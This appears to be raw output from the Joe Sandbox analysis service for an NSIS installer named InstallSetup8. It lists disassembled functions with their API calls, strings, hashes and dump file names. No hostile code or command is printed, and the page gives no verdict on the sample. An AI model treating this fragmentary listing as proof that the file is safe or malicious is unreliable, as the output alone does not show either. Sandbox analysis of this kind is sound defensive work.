Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400,?,?,00406338,?,?), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400,?,00000000,?,?,00406338,?,?), ref: 004061FE
wsprintfA.USER32(0042FD08,%ls=%ls,00430108,00430908,?,?,00406338,?,?), ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000,0040A580,00000000,00000000,?,?,?,?), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00403082 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(00009292,00441800,0043F000), ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNEL32(00000040,?), ref: 00403231

Strings

Null, xrefs: 00403179
Inst, xrefs: 00403167
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
Error launching installer, xrefs: 004030D2
soft, xrefs: 00403170

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-527102705
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,004326A0,?,00000000,00000007), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 0040675E
lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004067B8

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403323
GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32(?,... %d%%,00000000), ref: 00403406

Strings

... %d%%, xrefs: 00403400
A, xrefs: 00403483
*B, xrefs: 004032E4
A, xrefs: 00403379

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%
API String ID: 551687249-3485722521
Opcode ID: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB,?), ref: 0040455A
GetSysColor.USER32(00000000,?), ref: 00404598
SetTextColor.GDI32(?,00000000,?), ref: 004045A4
SetBkMode.GDI32(?,?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,000091FE), ref: 00405637
SetWindowTextW.USER32(0042BA48,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000,0042BA48,00000000,?,000091FE), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(?,00000064,?), ref: 00402FE1
wsprintfW.USER32(?,verifying installer: %d%%,00000000), ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?,?,?,00000000,?), ref: 00402A0B
GlobalFree.KERNEL32(00000000,?,00000000,?), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406805 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Uniqueness

Uniqueness Score: -1.00%

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004068F2
wsprintfW.USER32(?,%s%S.dll,00000001,?), ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401774 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,000091FE), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000,0042BA48,00000000,?,000091FE), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 0000000A.00000002.2030568125.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2030547915.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030588437.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030606740.000000000040A000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.2030631576.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
